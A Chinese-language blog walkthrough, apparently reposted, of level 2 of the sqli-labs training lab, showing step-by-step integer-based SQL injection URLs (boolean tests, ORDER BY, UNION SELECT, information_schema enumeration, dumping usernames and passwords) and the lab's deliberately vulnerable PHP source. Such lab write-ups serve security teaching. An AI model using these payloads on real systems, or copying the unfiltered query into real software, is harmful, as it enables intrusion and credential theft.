91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sqli-labs-master第二關:Error Based- Intiger

發布時間:2020-06-14 16:33:56 來源:網絡 閱讀:1983 作者:天道酬勤VIP 欄目:安全技術

接上篇博客:https://blog.51cto.com/tdcqvip/2060816


來到第二關:


http://127.0.0.1/sqli-labs-master/Less-2/


sqli-labs-master第二關:Error Based- Intiger


訪問http://127.0.0.1/sqli-labs-master/Less-2/?id=1


sqli-labs-master第二關:Error Based- Intiger


判斷是否有注入點:

and 1 = 1 返回正常

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 1 %23


sqli-labs-master第二關:Error Based- Intiger


and 1 = 2 返回失敗

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 2 %23


sqli-labs-master第二關:Error Based- Intiger


說明存在注入點:

order by  n 查看字段

當n=3時返回正確

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3  %23



sqli-labs-master第二關:Error Based- Intiger


當=4時返回錯誤

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4  %23


sqli-labs-master第二關:Error Based- Intiger


說明字段是3

用union select 進行聯合查詢:

并用報錯的方式顯示顯示位:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,3  %23


sqli-labs-master第二關:Error Based- Intiger


通過上圖可以看到顯示位在2,3上。

用version()和database()查看php版本和當前網站用的數據庫名字


sqli-labs-master第二關:Error Based- Intiger



我們通過上圖可以看到數據庫是“security” 版本是5.5.53

接下來我們查看數據庫security下的表:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23


sqli-labs-master第二關:Error Based- Intiger


通過上圖可以看到有users表

查看users表里的列

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1  union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

sqli-labs-master第二關:Error Based- Intiger


接下來就是查看username和password里的內容:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1  union select 1,username,password from users where id = 2 %23

sqli-labs-master第二關:Error Based- Intiger


結束:

聲明:源代碼被我改動了,所以在注入的時候才會顯示出來查詢語句


接下來看看源代碼:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-2 **Error Based- Intiger**</title>
</head>

<body bgcolor="#000000">




<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);


// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
echo $sql;
echo "<br>";

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-2.jpg" /></center>
</body>
</html>


通過源代碼我們可以看到,在連接數據庫查詢的時候并沒有進行任何過濾

與第一關不同的地方就是

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

這句,沒有“''”符號。


利用方式大致相同。


第三關盡快更新


微信公眾號:

sqli-labs-master第二關:Error Based- Intiger


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

阳城县| 三亚市| 阿克苏市| 凤山县| 波密县| 托里县| 锡林浩特市| 吉木萨尔县| 门头沟区| 德阳市| 齐齐哈尔市| 北安市| 新营市| 兴宁市| 固安县| 武平县| 和政县| 泗洪县| 昭通市| 湾仔区| 容城县| 镇江市| 兴安县| 前郭尔| 资讯| 娄底市| 鹤壁市| 夹江县| 绥德县| 清水县| 巴塘县| 滁州市| 闵行区| 图片| 潜江市| 卢湾区| 石嘴山市| 揭阳市| 二连浩特市| 崇信县| 赣榆县|